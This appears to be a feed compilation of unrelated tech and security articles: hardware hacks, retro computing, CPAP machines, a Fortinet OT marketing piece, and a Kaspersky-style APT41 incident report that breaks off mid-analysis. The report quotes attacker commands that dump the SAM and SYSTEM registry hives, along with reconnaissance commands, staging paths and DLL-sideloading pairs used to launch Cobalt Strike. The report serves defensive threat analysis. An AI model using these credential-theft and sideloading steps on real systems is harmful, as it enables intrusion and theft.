Infine, come misure di tutela, Lin Yue ha consigliato ai consumatori di limitare la quantità di dati personali condivisi con i brand e di cambiare regolarmente le proprie password. Per le aziende, invece, ha suggerito di trattare i dati come asset intangibili fondamentali, adottare tecnologie di protezione più avanzate – come password dinamiche per i sistemi CRM e limitazioni dell’accesso fuori orario – per consolidare davvero la fiducia dei propri clienti.
L'articolo Fuga di dati Louis Vuitton: 420.000 clienti coinvolti a Hong Kong proviene da il blog della sicurezza informatica.
Paste Extrusion for 3D Printing Glass and Eggshells
In contrast to the success of their molten-plastic cousins, paste extrusion 3D printers have never really attained much popularity. This is shame because, as the [Hand and Machine] research group at the University of New Mexico demonstrate, you can use them to print with some really interesting materials, including glass and eggshell (links to research papers, with presentations in the supplemental materials).
To print with glass, the researchers created a clay-like paste out of glass frit, methyl cellulose and xanthan gum as shear-thinning binders, and water. They used a vacuum chamber to remove bubbles, then extruded the paste from a clay 3D printer. After letting the resulting parts dry, they fired them in a kiln at approximately 750 ℃ to burn away the binder and sinter the frit. This introduced some shrinkage, but it was controllable enough to at least make decorative parts, and it might be predictable enough to make functional parts after some post-processing. Path generation for the printer was an interesting problem; the printer couldn’t start and stop extrusion quickly, so [Hand and Machine] developed a custom slicer to generate tool paths that minimize material leakage. To avoid glass walls collapsing during firing, they also wrote another slicer to maintain constant wall thicknesses.
The process for printing with eggshell was similar: the researchers ground eggshells into a powder, mixed this with water, methyl cellulose and xanthan gum, and printed with the resulting paste. After drying, the parts didn’t need any additional processing. The major advantage of these parts is their biodegradability, as the researchers demonstrated by printing a biodegradable pot for plants. To be honest, we don’t think that this will be as useful an innovation for hackers as the glass could be, but it does demonstrate the abilities of paste extrusion.
The same team has previously used a paste printer to 3D print in metal. If you don’t have a paste printer, it’s also possible to print glass using a laser cutter, or you could always make your own paste extruder.
Floating Buoy Measures Ocean Conditions
Out on Maui, [rabbitcreek] desired to keep track of local ocean conditions. The easiest way to do that was by having something out there in the water to measure them. Thus, they created a floating ocean sensor that could report back on what’s going on in the water.
The build uses a Xiao ESP32-S3 as the brains of the operation. It’s paired with a Wio-SX1262 radio kit, which sends LoRa signals over longer distances than is practical with the ESP32’s onboard WiFi and Bluetooth connections. The microcontroller is hooked up with a one-wire temperature sensor, a DF Robot turbidity sensor, and an MPU6050 gyroscope and accelerometer, which allow it to measure the water’s condition and the motion of the waves. The whole sensor package is wrapped up inside a 3D printed housing, with the rest of the electronics in a waterproof Pelican case.
It’s a neat project that combines a bunch of off-the-shelf components to do something useful. [rabbitcreek] notes that the data would be even more useful with a grid of such sensors all contributing to a larger dataset for further analysis. We’ve seen similar citizen science projects executed nicely before, too. If you’ve been doing your own ocean science, don’t hesitate to let us know what you’re up to on the tipsline!
Sei stato vittima di estorsione su telegram? Contatta Direttamente Pavel Durov
Pavel Durov, il fondatore di Telegram, ha lanciato l’allarme per una nuova ondata di estorsioni all’interno della piattaforma. Stiamo parlando di truffatori che chiedono agli utenti di consegnare beni digitali di valore: regali, numeri e nomi Telegram rari. Questi oggetti, precedentemente acquistati per pochi dollari, ora possono essere venduti per cifre superiori a 100.000 dollari.
Secondo Durov, recentemente si sono verificati casi di criminali che ricattano i proprietari di tali beni. In alcuni casi, gli estorsori minacciano di rivelare informazioni personali o riservate. C’è anche chi ha trasformato questa pratica in un vero e proprio complotto: pubblicano post compromettenti e chiedono un risarcimento per la loro rimozione.
“Questo è illegale e immorale. Non lo tollereremo”, ha dichiarato Durov sul suo canale ufficiale. Ha sottolineato che Telegram combatterà questo comportamento e cancellerà gli account coinvolti.
A chi è stato vittima di estorsione viene chiesto di raccogliere prove e inviarle direttamente tramite messaggio personale a Pavel Durov. Tuttavia, come ha spiegato lo stesso fondatore di Telegram, non tutti possono farlo a causa dell’accesso a pagamento (paywall) attivo. Ha osservato che quando è disattivato, il numero di messaggi in arrivo supera le migliaia al minuto, motivo per cui non ha fisicamente il tempo di visualizzarli.
A questo proposito, Durov ha suggerito un metodo alternativo: contattare il servizio di supporto ufficiale di Telegram tramite l’account @notoscam, aggiungendo l’hashtag #blackmail al messaggio. Questo aiuterà a inoltrare rapidamente il reclamo al moderatore competente.
L'articolo Sei stato vittima di estorsione su telegram? Contatta Direttamente Pavel Durov proviene da il blog della sicurezza informatica.
Coleco Adam: A Commodore 64 Competitor, Almost
For a brief, buzzing moment in 1983, the Coleco Adam looked like it might out-64 the Commodore 64. Announced with lots of ambition, this 8-bit marvel promised a complete computing package: a keyboard, digital storage, printer, and all for under $600. An important fact was that it could morph your ColecoVision into a full-fledged CP/M-compatible computer. So far this sounds like a hacker’s dream: modular, upgradeable, and… misunderstood.
The reality was glorious chaos. The Adam used a daisy-wheel printer as a power supply (yes, really), cassettes that demagnetized themselves, and a launch delayed into oblivion. Yet beneath the comedy of errors lurked something quite tempting: a Z80-based system with MSX-like architecture and just enough off-the-shelf parts to make clone fantasies plausible. Developers could have ported MSX software in weeks. Had Coleco shipped stable units on time, the Adam might well have eaten the C64’s lunch – while inspiring a new class of hybrid machines.
Instead, it became a collector’s oddball. But for the rest of us, it is a retro relic that invites us to ponder – or even start building: what if modular computing had gone mainstream in 1983?
Testing Your Knowledge of JavaScript’s Date Class
JavaScript is everywhere these days, even outside the browser. Everyone knows that this is because JavaScript is the best programming language, which was carefully assembled by computer experts and absolutely not monkeyed together in five days by some bloke at Netscape in the 90s. Nowhere becomes this more apparent than in aspects like JavaScript’s brilliantly designed Date class, which astounds people to this day with its elegant handling of JavaScript’s powerful type system. This is proudly demonstrated by the JS Date quiz by [Samwho].
Recently [Brodie Robertson] decided to bask in the absolute glory that is this aspect of JavaScript, working his way through the quiz’s 28 questions as his mind gradually began to crumble at the sheer majesty of this class’ elegance and subtle genius. Every answer made both logical and intuitive sense, and left [Brodie] gobsmacked at the sheer realization that such a language was designed by mere humans.
After such a humbling experience, it would only seem right to introduce the new JS convert to the book JavaScript: The Good Parts, to fully prepare them for their new career as a full-stack JS developer.
youtube.com/embed/IRX5TuggMxg?…
A Lockpicking Robot That Can Sense the Pins
Having a robot that can quickly and unsupervised pick any lock with the skills of a professional human lockpicker has been a dream for many years. A major issue with lockpicking robots is however the lack of any sensing of the pins – or equivalent – as the pick works its magic inside. One approach to try and solve this was attempted by the [Sparks and Code] channel on YouTube, who built a robot that uses thin wires in a hollow key, load cells and servos to imitate the experience of a human lockpicker working their way through a pin-tumbler style lock.
Although the experience was mostly a frustrating series of setbacks and failures, it does show an interesting approach to sensing the resistance from the pin stack in each channel. The goal with picking a pin-tumbler lock is to determine when the pin is bound where it can rotate, and to sense any false gates from security pins that may also be in the pin stack. This is not an easy puzzle to solve, and is probably why most lockpicking robots end up just brute-forcing all possible combinations.
Perhaps that using a more traditional turner and pick style approach here – with one or more loadcells on the pick and turner- or a design inspired by the very effective Lishi decoding tools would be more effective here. Regardless, the idea of making lockpicking robots more sensitive is a good one, albeit a tough nut to crack. The jobs of YouTube-based lockpicking enthusiasts are still safe from the robots, for now.
Thanks to [Numbnuts] for the tip.
youtube.com/embed/-EqSJTBMepA?…
2025 One-Hertz Challenge: It’s Hexadecimal Unix Time
[danjovic] came up with a nifty entry for our 2025 One-Hertz Challenge that lands somewhere between the categories of Ridiculous and Clockwork. It’s a clock that few hackers, if any, could read on sight—just the way we like them around here!
The clock is called Hexa U.T.C, which might give you an idea why this one is a little tricky to parse. It displays the current Unix time in hexadecimal format. If you’re unfamiliar, Unix time is represented as the number of non-leap seconds that have ticked by since 1 January 1970 at 00:00:00 UTC. Even if you can turn the long hex number into decimal in your head, you’re still going to have to then convert the seconds into years, days, hours, minutes, and seconds before you can figure out the actual time.
The build relies on an ESP32-S2 module, paired with a 7-segment display module driven by the TM1638 I/O expander. The ESP32 syncs itself up with an NTP time server, and then spits out the relevant signals to display the current Unix time in hex on the 7-segment displays.
It’s a fun build that your programmer friends might actually figure out at a glance. As a bonus it makes an easy kicking-off point for explaining the Year 2038 problem. We’ve featured other similar Unix clocks before, too. Video after the break.
youtube.com/embed/git1te5nhhI?…
Freezer Monitoring: Because Ice Cream Is a Dish Best Served Cold
[Scott Baker] wrote in to let us know about his freezer monitor.
After a regrettable incident where the ice cream melted because the freezer failed [Scott] decided that what was called for was a monitoring and alerting system. We enjoyed reading about this hack, and we’ll give you the details in just a tick, but before we do, we wanted to mention [Scott]’s justifications for why he decided to roll his own solution for this, rather than just using the bundled proprietary service from the white goods manufacturer.
We’re always looking for good excuses for rolling our own systems, and [Scott]’s list is comprehensive: no closed-source, no-api cloud service required, can log with high fidelity, unlimited data retention, correlation with other data possible, control over alerting criteria, choice of alerting channels. Sounds fair enough to us!
The single-board computer of choice is the Raspberry Pi Zero 2 W. As [Scott] says, it’s nice to be able to SSH into your temperature monitoring system. The sensor itself is the DS18B20. [Scott] 3D printed a simple case to hold the electronics. The other materials required are a 4.7k resistor and a power cable. The instructions for enabling the 1-wire protocol in Raspbian are documented in INSTALL.md.
When it comes time for programming, [Scott’s] weapon of choice is GoLang. He uses Go to process the file system exported by the 1-wire drivers under /sys/bus/w1/devices. He sets the Pi Zero up as an HTTP endpoint for Prometheus to scrape. He uses a library from Sergey Yarmonov to daemonize his monitoring service.
Then he configures his ancient version of Prometheus with the requisite YAML. The Prometheus configuration includes specifications of the conditions that should result in alerts being sent. Once that’s done, [Scott] configures a dashboard in Grafana. He is able to show two charts using the same timescale to correlate garage energy usage with freezer temperatures. Mission accomplished!
Now that you know how to make a freezer monitor, maybe it’s time to make yourself a freezer.
Fixing Human Sleep With Air Under Pressure
By and large, the human body is designed to breathe from birth, and keep breathing continuously until death. Indeed, if breathing stops, lifespan trends relatively rapidly towards zero. There’s a whole chunk of the brain and nervous system dedicated towards ensuring oxygen keeps flowing in and carbon dioxide keeps flowing out.
Unfortunately, the best laid plans of our body often go awry. Obstructive sleep apnea is a condition in which a person’s airways become blocked by the movement of soft tissues in the throat, preventing the individual from breathing. It’s a mechanical problem that also has a mechanical solution—the CPAP machine.
Under Pressure
The underlying mechanism of obstructive sleep apnea (OSA) is quite straightforward. During sleep, as the throat, neck, and skeletal muscles all relax, the tongue and/or soft palette can come to block the airway. When this happens, fresh air cannot pass to the lungs, nor can the individual exhale. Breathing is effectively halted, sometimes for minutes at a time. As the individual’s oxygen saturation drops and carbon dioxide levels build up, the brain and nervous system typically trigger an arousal in which the person enters a lighter stage of sleep or wakes up to some degree. The arousal may simply involve a change of position to restore normal breathing, or the individual may wake more fully while gasping for air. Having cleared the airway and resumed normal respiration, the individual generally returns to deeper sleep. As they do, and the muscles relax again, a further obstructive apnea may occur with similar results.
For those suffering from sleep apnea, these arousals can occur many hundreds of times a night. Each disrupts the normal cycles of sleep, generally leading to symptoms of serious sleep deprivation. These arousals often occur without the individual having any awareness they occurred. Sleep apnea can thus easily go undiagnosed, as individuals do not know the cause of their fatigue. In many cases, reports of heavy snoring from sleeping partners are what leads to a sleep apnea diagnosis, as breathing typically becomes louder as the airway slowly closes due to the muscles relaxing during sleep.
Ultimately, the solution to sleep apnea is to stop the airway becoming blocked in the first place, allowing normal breathing to continue all the way through sleep. The problem is that it’s difficult to access the tissues deep in the airway. One might imagine placing some kind of mechanical device into the throat to keep the airway open, but this would be highly invasive. It would also likely pose a choking risk if disrupted during sleep.
Enter the CPAP machine—short for “continuous positive airway pressure.” Invented by Australian doctor Colin Sullivan in 1980, the idea behind it is simple—pressurize the individual’s airway in order to hold it open and prevent the tongue and soft tissues from causing a blockage. Air pressures used are relatively low. Machines typically deliver in the range of 4 to 20 cm H2O, which has been found sufficient to keep an airway open during sleep. The CPAP machine doesn’t breathe for the user—it just provides air to the airway at greater than atmospheric pressure.
Key to the use of CPAP is how to get the pressurized air inside the airway. Early machines pressurized a large helmet, with an air seal around the neck. Today, modern CPAP machines deliver carefully-controlled pressurized air via a mask. Nasal masks are the least-invasive option, which pressurize the whole airway via the nostrils alone. These masks require that the mouth remain closed during sleep, else the pressurized air is free to leave the airway. Full-face masks, which are similar to those used for other medical procedures, can be used for individuals who need to breathe through their mouth while sleeping.
Overall, a CPAP machine is relatively simple to understand. It consists of a pump to provide pressurized air to the mask, and a user interface for configuring the pressure and other settings. CPAP machines often also feature humidification to stop the supplied air from drying out the user’s mouth and/or nose. This can be paired with heated tubing to warm the air, which avoids condensation from forming in the tube or mask during use. This is called “rainout” and can be unpleasant for the user. Modern machines can also carefully monitor pressure levels and airflow, logging breathing events and other data for later analysis.
CPAP treatment is not without its issues, however. Users must grow accustomed to wearing a mask while sleeping, as well as adjust to the feeling of breathing in and exhaling out against the continuous incoming pressure from the machine. It’s also important for users to get a suitable mask fit, to avoid issues like skin redness or pressure leaking from the mask. In the latter case, a CPAP machine will be ineffective at keeping an airway open if pressure is lost via leaks. These problems lead to relatively low compliance with CPAP use among those with obstructive sleep apnea. Studies suggest 8% to 15% abandon CPAP use after a single night, while 50% stop using CPAP within their first year. Regardless, the benefits of CPAP machines are well-supported by the available scientific literature. Studies have shown that use of CPAP treatment can reduce sleepiness, blood pressure, and the prevalence of motor vehicle crashes in those with obstructive sleep apnea.
Nobody likes the idea of being semi-woken tens or hundreds of times a night, but for sleep apnea sufferers, that’s precisely what can happen. The CPAP machine is the mechanical solution that provides a good night’s rest, all thanks to a little pressurized air.
Featured image: “wide variety of masks at cpap centra” by [Rachel Tayse]. (Gotta love that title!)
Don’t Turn That Old System On, First Take it Apart
When you first get your hands on an old piece of equipment, regardless of whether it’s an old PC or some lab equipment, there is often the temptation to stick a power lead into it and see what the happy electrons make it do. Although often this will work out fine, there are many reasons why this is a terrible idea. As many people have found out by now, you can be met by the wonderful smell of a Rifa capacitor blowing smoke in the power supply, or by fascinatingly dangly damaged power wires, as the [Retro Hack Shack] on YouTube found recently in an old Gateway PC.
Fortunately, this video is a public service announcement and a demonstration of why you should always follow the sage advice of “Don’t turn it on, take it apart”. Inside this Gateway 2000 PC from 1999 lurked a cut audio cable, which wasn’t terribly concerning. The problem was also a Molex connector that had at some point been violently ripped off, leaving exposed wiring inside the case. The connector and the rest of the wiring were still found in the HDD.
Other wires were also damaged, making it clear that the previous owner had tried and failed to remove some connectors, including the front panel I/O wiring. Thankfully, this PC was first torn apart so that the damage could be repaired, but it shows just how easily a ‘quick power-on check’ can turn into something very unpleasant and smelly.
youtube.com/embed/mHWUtvGMhH4?…
Why Apple Dumped 2,700 Computers In A Landfill in 1989
In 1983, the Lisa was supposed to be a barnburner. Apple’s brand-new computer had a cutting edge GUI, a mouse, and power far beyond the 8-bit machines that came before. It looked like nothing else on the market, and had a price tag to match—retailing at $9,995, or the equivalent of over $30,000 today.
It held so much promise. And yet, come 1989, Apple was burying almost 3,000 examples in a landfill. What went wrong?
Promise
The Lisa computer, released in 1983, was Apple’s first attempt at bringing a graphical user interface to the masses. The name was officially an acronym for “Local Integrated Software Architecture,” though many believed it was actually named after Steve Jobs’ daughter. In any case, the Lisa was groundbreaking in ways that wouldn’t be fully appreciated until years later.
The Lisa stepped away from the long-lived 6502 CPU that had powered the Apple II line. Instead, it relied upon the exciting new Motorola 68000, with its hybrid 16-bit/32-bit architecture and fast 5 MHz clock speed. The extra power came in handy, as the Lisa was to be one of the first retail computers to be sold with a graphical user interface—imaginatively titled Lisa OS. Forget command lines and character displays—the Lisa had icons and a mouse, all rendered on a glorious 720 x 364 monochrome monitor with rectangular pixels. Adopters of Apple’s new rectangular machine also got twin 5.25-inch double-sided floppy drives, and the Lisa included three expansion slots and a parallel port for adding additional peripherals.
The Lisa seemed to offer a great leap forward in capability, but the same could be said of its price. At launch in 1983, it retailed at $9,995, equivalent to over $30,000 in 2025 dollars. The price was many multiples beyond what you might pay for an IBM PC, making it a tough pill to swallow even given what the Lisa had to offer. The GUI might have been cutting-edge, too, but the implementation wasn’t perfect. The Lisa had a tendency to chug.
There was also a further problem. Apple’s very own Steve Jobs may have worked on the Lisa, but he was kicked off the project in 1981, prior to launch. Jobs then jumped ship to the nascent Macintosh development effort, which was initially intended to be a low-cost text-based computer retailing for under $1,000. Jobs swiftly redirected the Macintosh project to make it a GUI-based machine, while retaining the intention to come in at a far more affordable price-point than the exorbitantly-priced Lisa.
The result was damaging. Just as the Lisa was launching, rumors were already swirling about Apple’s upcoming budget machine. When the Macintosh hit the market in 1984, it immediately blitzed the Lisa in sales. Both machines had a mouse and a GUI, and the Macintosh even had a more forward-looking 3.25-inch floppy drive. True, the Mac wasn’t anywhere near as beefy as the Lisa; most notably, it had just 128K of RAM to the 1MB in Apple’s flagship machine. Ultimately, though, the market voted Mac—perhaps unsurprising given it retailed at $2,495—a quarter of the Lisa’s debut price. Come May, Apple had sold 70,000 units, thanks in part do a legendary commercial directed by the Ridley Scott. Meanwhile, it took the Lisa a full two years to sell just 50,000.
Apple tried to make the best of things. The Lisa was followed by the Lisa 2, and it was then rebadged as the Macintosh XL. Ultimately, though, it would never find real purchase in the marketplace, even after severe price cuts down to $3,995 in 1985. By 1986, it was all over—Apple discontinued the Lisa line.
The following years weren’t kind. A bunch of 5000 Lisas ended up being bought by third-party company Sun Remarketing, which upgraded them and sold them on as “Lisa Professionals” and “Macintosh Professionals.” However, cut to 1989, and Apple had a better idea. The Lisas were going to a dump in Logan, Utah.
The story would end up making the news, with The Herald Journal reporting on what was then an astounding story. 2,700 brand new computers were being sent to straight to landfill. This was particularly shocking in the era, given that computers were then still relatively novel in the marketplace and sold for an incredibly high price.
The reason behind it was pure business. “Right now, our fiscal year end is fast approaching and rather than carrying that product on the books, this is a better business decision,” Apple spokesperson Carleen Lavasseur told the press. Apple was able to gain a tax write off the computers, and it was estimated it could reclaim up to $34 for every $100 of depreciated value in the machines which were now considered obsolete. Apple paid $1.95 a yard for over 880 cubic yards of space at the landfill to dump the machines. Other reports on the event noted that guards apparently stood on site to ensure the machines were destroyed and could not be recovered.
It’s a story that might recall you of Atari’s ET, another grand embarrassment covered up under a pile of trash. Sometimes, products fail, and there’s little more to do than call the trucks and all them away. The Apple Lisa is perhaps one of the nicer machines that’s ever happened to.
Bearing Witness: Measuring the Wobbles in Rotary Build
3D printing has simplified the creation of many things, but part of making something is knowing just how much you can rely on it. On the [BubsBuilds] YouTube channel, he built a cheap rotary table and then walked through the process of measuring the error inherent in any rotating system.
Starting with a commercial rotary table, [BubsBuilds] decided he wanted a rotary stage that was both lighter and had provisions for motorized movement. Most of the rotary build is 3D printed, with the large housing and table made from PETG, and the geared hub and worm gear printed on a resin printer. The bearings used to support the worm gear are common skateboard bearings. There is also a commercial thrust bearing and 49 larger 9.5mm ball bearings supporting the rotating tabletop.
More after the break…
There are three different types of runout to be measured on a rotating stage: axial, radial, and angular. Axial runout is fairly straightforward to discern by measuring the vertical variation of the table as it rotates. Radial runout measures how true the rotation is around the center of the table. Angular runout measures how level the table stays throughout its range. Since these two runouts are tied to each other, [BubsBuilds] showed how you can take measurements at two different heights and use trigonometry to obtain both your radial and angular runout. This is a great walkthrough of how to approach measuring and characterizing a system that has multiple variables at play. Be sure to check out some of the other cool rotary tables we’ve featured.
youtube.com/embed/No_XLqeN2oE?…
The end of online anonymity
IT'S MONDAY, AND THIS IS DIGITAL POLITICS. I'm Mark Scott, and I'm slightly regretting taking my summer vacation early now that a lot of you are downing tools for a well-deserved break. Think of me as you all catch up on your summer reading by the beach.
— A new generation of 'age verification' rules aimed at protecting kidsis breaking the long-standing principle that everyone is anonymous online.
— What to expect from the White House's upcoming AI Action plan to be announced on July 23 that will lay out the US federal government's thinking.
— The European Union's next seven-year budget will likely earmark billions of dollars for next-generation technologies and digital rulemaking.
Let's get started:
OT Cybersecurity: non solo una questione di Direttive e di Regolamenti
A cura di Costel Onufrei, Specialized Systems Engineer OT, Fortinet Italy
Oggigiorno è sempre più evidente come le infrastrutture Operational Technology (OT), conseguentemente alla convergenza tra IT e OT e alla loro maggiore complessità, siano in misura crescente esposte a nuovi rischi. Questo porta ad un aumento esponenziale della superficie d’attacco che non guarda più a IT e OT come due mondi separati, ma come un unico singolo bersaglio, aprendo la strada a nuove minacce e vulnerabilità volte a colpire le infrastrutture critiche oltre che il cuore delle realtà industriali, la produzione.
Lo scenario descritto è ulteriormente evidenziato dai dati indicati dal rapporto Clusit 2025, dove il settore manifatturiero ha superato, in termini di attacchi a livello globale, il settore finanziario. Se consideriamo che le infrastrutture OT, per loro stessa natura, sono basate su tecnologie che non possiedono una “security-by-design”, tipicamente obsolete e con poche patch di sicurezza applicate durante il loro prolungato ciclo di vita, si evince come questo contesto sia estremamente critico per la corretta operatività delle organizzazioni che se ne avvalgono.
Vista la complessità, da dove si può iniziare? Ponendosi domande concrete su come funziona l’infrastruttura e quali metriche adottare per proteggerla. Analizzando i rischi annessi, si possono individuare le aree che richiedono un intervento più rapido. Tipicamente si parte da alcune domande basilari:
- Come sono interconnesse le macchine di produzione o gli impianti?
- Come sono gestite le reti interne degli impianti produzione?
- Quali dispositivi sono presenti all’interno delle reti OT?
- Hanno delle vulnerabilità conosciute?
- Come sono tracciati gli accessi interni ed esterni alle infrastrutture OT?
In questo contesto diventa fondamentale che le aziende affrontino le sfide della sicurezza OT con un approccio basato su standard internazionali e best practice come NIST o ISA/IEC 62443, mettendo in atto:
Visibilità e controllo delle risorse OT: Grazie all’utilizzo di FortiGate Rugged NGFW e servizi dedicati come FortiGuard OT Security Service, ci avvaliamo di 3.300 regole legate a protocolli OT e 750 regole IPS specifiche per ambienti OT, che consentono di mappare in tempo reale l’infrastruttura OT. Il servizio distingue dispositivi legittimi da quelli non autorizzati, offrendo anche oltre 1.500 regole di virtual patching per la protezione dei sistemi legacy da attacchi già riconosciuti e classificati, intercettando e bloccando exploit noti (KEV – Known Exploited Vulnerabilities) prima che raggiungano i dispositivi vulnerabili, proteggendo efficacemente anche i sistemi OT non aggiornabili.
Segmentazione e contenimento: Per ridurre il rischio di intrusioni è richiesto un ambiente OT con controlli di accesso rigorosi tramite policy di rete in tutti i punti di accesso; questo approccio inizia con la creazione di zone e conduits di rete, attuabili con FortiGate Rugged NGFW per il traffico di rete verticale, e ulteriormente ampliabile con FortiSwitch Rugged, consentendo una segmentazione di rete avanzata a livello di porta. Questi switch “rugged”, integrati nativamente con FortiOS, permettono di isolare logicamente linee produttive, accessi remoti e reti IT/OT, contrastando movimenti laterali non autorizzati e semplificando la gestione della sicurezza.
Accesso da remoto sicuro: Permettere a operatori remoti di accedere alle reti OT può essere estremamente vantaggioso in termini di riduzione dei tempi di fermo e rapidità d’intervento, bisogna però implementare soluzioni di accesso da remoto che abbiano funzioni di sicurezza integrate: FortiPAM, FortiSRA (ora aggiornato con nuove funzionalità di gestione delle credenziali e dei segreti per ambienti OT), insieme a FortiClient e FortiToken, integrabili grazie alla Fortinet Security Fabric, ci aiutano a mettere le basi per un accesso remoto protetto, controllato e tracciabile anche in scenari distribuiti o estremamente sensibili.
Integrazione e orchestrazione: La Fortinet OT Security Platform si integra nella Fortinet Security Fabric per consentire facilmente la convergenza e la connettività delle IT/OT. Questo aiuta ad aumentare la visibilità e la risposta in tempo reale sull’intera superficie di attacco e consente ai team Security Operations Center (SOC) di diventare più efficienti ed efficaci nei tempi di risposta in fabbriche, impianti, sedi remote.
Una best practice che ha effetti positivi: il rapporto Fortinet
Il Global 2025 State of Operational Technology and Cybersecurity Report di Fortinet evidenzia una riduzione rilevante del numero di vendor di dispositivi OT, indicatore di maggiore maturità ed efficienza operativa. Oggi, il 78% delle organizzazioni utilizza solo da uno a quattro fornitori OT, a dimostrazione di un processo di consolidamento.
Il consolidamento dei vendor di cybersecurity è sintomo di maturità, coerente con quanto osservato tra i clienti Fortinet che adottano la piattaforma Fortinet OT Security. L’unificazione di rete e sicurezza nei siti OT remoti ha migliorato la visibilità e ridotto i rischi cyber, portando a una riduzione del 93% degli incidenti rispetto a una rete piatta. Le soluzioni semplificate di Fortinet, inoltre, hanno consentito un miglioramento delle performance pari a 7 volte, grazie alla riduzione dei tempi di triage e configurazione.
È fondamentale proseguire in questa direzione: la protezione degli ambienti industriali non è più una questione tecnica, ma un tema di business continuity, reputazione e competitività.
Per saperne di più sullo stato della sicurezza OT nel 2025, leggi il rapporto completo di Fortinet.
L'articolo OT Cybersecurity: non solo una questione di Direttive e di Regolamenti proviene da il blog della sicurezza informatica.
Reverse Engineering a ‘Tony’ 6502-based Mini Arcade Machine
For some reason, people are really into tiny arcade machines that basically require you to ruin your hands and eyes in order to play on them. That said, unlike the fifty gazillion ‘retro consoles’ that you can buy everywhere, the particular mini arcade machine that [David Given] of [Poking Technology] obtained from AliExpress for a teardown and ROM dump seems to have custom games rather than the typical gaggle of NES games and fifty ROM hack variations of each.
After a bit of gameplay to demonstrate the various games on the very tiny machine with tiny controls and a tiny 1.8″, 160×128 ST7735 LC display, the device was disassembled. Inside is a fairly decent speaker, the IO board for the controls, and the mainboard with an epoxy blob-covered chip and the SPI EEPROM containing the software. Dumping this XOR ‘encrypted’ ROM was straightforward, revealing it to be a 4 MB, W23X32-compatible EEPROM.
More after the break…
Further reverse-engineering showed the CPU to be a WDT65C02-compatible chip, running at 8 MHz with 2 kB of SRAM and 8 kB of fast ROM in addition to a 24 MHz link to the SPI EEPROM, which is used heavily during rendering. [David] created a basic SDK for those who feel like writing their own software for this mini arcade system. Considering the market that these mini arcade systems exist in, you’ve got to give the manufacturer credit for creating a somewhat original take, with hardware that is relatively easy to mod and reprogram.
Thanks to [Clint Jay] for the tip.
youtube.com/embed/jJ0XmZvR4bU?…
Rumble in the jungle: APT41’s new target in Africa
Introduction
Some time ago, Kaspersky MDR analysts detected a targeted attack against government IT services in the African region. The attackers used hardcoded names of internal services, IP addresses, and proxy servers embedded within their malware. One of the C2s was a captive SharePoint server within the victim’s infrastructure.
During our incident analysis, we were able to determine that the threat actor behind the activity was APT41. This is a Chinese-speaking cyberespionage group known for targeting organizations across multiple sectors, including telecom and energy providers, educational institutions, healthcare organizations and IT energy companies in at least 42 countries. It’s worth noting that, prior to the incident, Africa had experienced the least activity from this APT.
Incident investigation and toolkit analysis
Detection
Our MDR team identified suspicious activity on several workstations within an organization’s infrastructure. These were typical alerts indicating the use of the WmiExec module from the Impacket toolkit. Specifically, the alerts showed the following signs of the activity:
- A process chain of svchost.exe ➔exe ➔ cmd.exe
- The output of executed commands being written to a file on an administrative network share, with the file name consisting of numbers separated by dots:
WmiExec process tree
The attackers also leveraged the Atexec module from the Impacket toolkit.
Scheduler tasks created by Atexec
The attackers used these commands to check the availability of their C2 server, both directly over the internet and through an internal proxy server within the organization.
The source of the suspicious activity turned out to be an unmonitored host that had been compromised. Impacket was executed on it in the context of a service account. We would later get that host connected to our telemetry to pinpoint the source of the infection.
After the Atexec and WmiExec modules finished running, the attackers temporarily suspended their operations.
Privilege escalation and lateral movement
After a brief lull, the attackers sprang back into action. This time, they were probing for running processes and occupied ports:
cmd.exe /c netstat -ano > C:\Windows\temp\temp_log.log
cmd.exe /c tasklist /v > C:\Windows\temp\temp_log.log
They were likely trying to figure out if the target hosts had any security solutions installed, such as EDR, MDR or XDR agents, host administration tools, and so on.
Additionally, the attackers used the built-in reg.exe utility to dump the SYSTEM and SAM registry hives.
cmd.exe /c reg save HKLM\SAM C:\Windows\temp\temp_3.log
cmd.exe /c reg save HKLM\SYSTEM C:\Windows\temp\temp_4.log
On workstations connected to our monitoring systems, our security solution blocked the activity, which resulted in an empty dump file. However, some hosts within the organization were not secured. As a result, the attackers successfully harvested credentials from critical registry hives and leveraged them in their subsequent attacks. This underscores a crucial point: to detect incidents promptly and minimize damage, security solution agents must be installed on all workstations across the organization without exception. Furthermore, the more comprehensive your telemetry data, the more effective your response will be. It’s also crucial to keep a close eye on the permissions assigned to service and user accounts, making sure no one ends up with more access rights than they really need. This is especially true for accounts that exist across multiple hosts in your infrastructure.
In the incident we’re describing here, two domain accounts obtained from a registry dump were leveraged for lateral movement: a domain account with local administrator rights on all workstations, and a backup solution account with domain administrator privileges. The local administrator privileges allowed the attackers to use the SMB protocol to transfer tools for communicating with the C2 to the administrative network share C$. We will discuss these tools – namely Cobalt Strike and a custom agent – in the next section.
In most cases, the attackers placed their malicious tools in the C:\WINDOWS\TASKS\ directory on target hosts, but they used other paths too:
c:\windows\tasks\
c:\programdata\
c:\programdata\usoshared\
c:\users\public\downloads\
c:\users\public\
c:\windows\help\help\
c:\users\public\videos\
Files from these directories were then executed remotely using the WMI toolkit:
Lateral movement via privileged accounts
C2 communication
Cobalt Strike
The attackers used Cobalt Strike for C2 communication on compromised hosts. They distributed the tool as an encrypted file, typically with a TXT or INI extension. To decrypt it, they employed a malicious library injected into a legitimate application via DLL sideloading.
Here’s a general overview of how Cobalt Strike was launched:
Attackers placed all the required files – the legitimate application, the malicious DLL, and the payload file – in one of the following directories:
C:\Users\Public\
C:\Users\{redacted}\Downloads\
C:\Windows\Tasks\
The malicious library was a legitimate DLL modified to search for an encrypted Cobalt Strike payload in a specifically named file located in the same directory. Consequently, the names of the payload files varied depending on what was hardcoded into the malicious DLL.
During the attack, the threat actor used the following versions of modified DLLs and their corresponding payloads:
| Legitimate file name | DLL | Encrypted Cobalt Strike |
| TmPfw.exe | TmDbg64.dll | TmPfw.ini |
| cookie_exporter.exe | msedge.dll | Logs.txt |
| FixSfp64.exe | log.dll | Logs.txt |
| 360DeskAna64.exe | WTSAPI32.dll | config.ini |
| KcInst.exe | KcInst32.dll | kcinst.log |
| MpCmdRunq.exe | mpclient.dll | Logs.txt |
Despite using various legitimate applications to launch Cobalt Strike, the payload decryption process was similar across instances. Let’s take a closer look at one example of Cobalt Strike execution, using the legitimate file cookie_exporter.exe, which is part of Microsoft Edge. When launched, this application loads msedge.dll, assuming it’s in the same directory.
The attackers renamed cookie_exporter.exe to Edge.exe and replaced msedge.dll with their own malicious library of the same name.
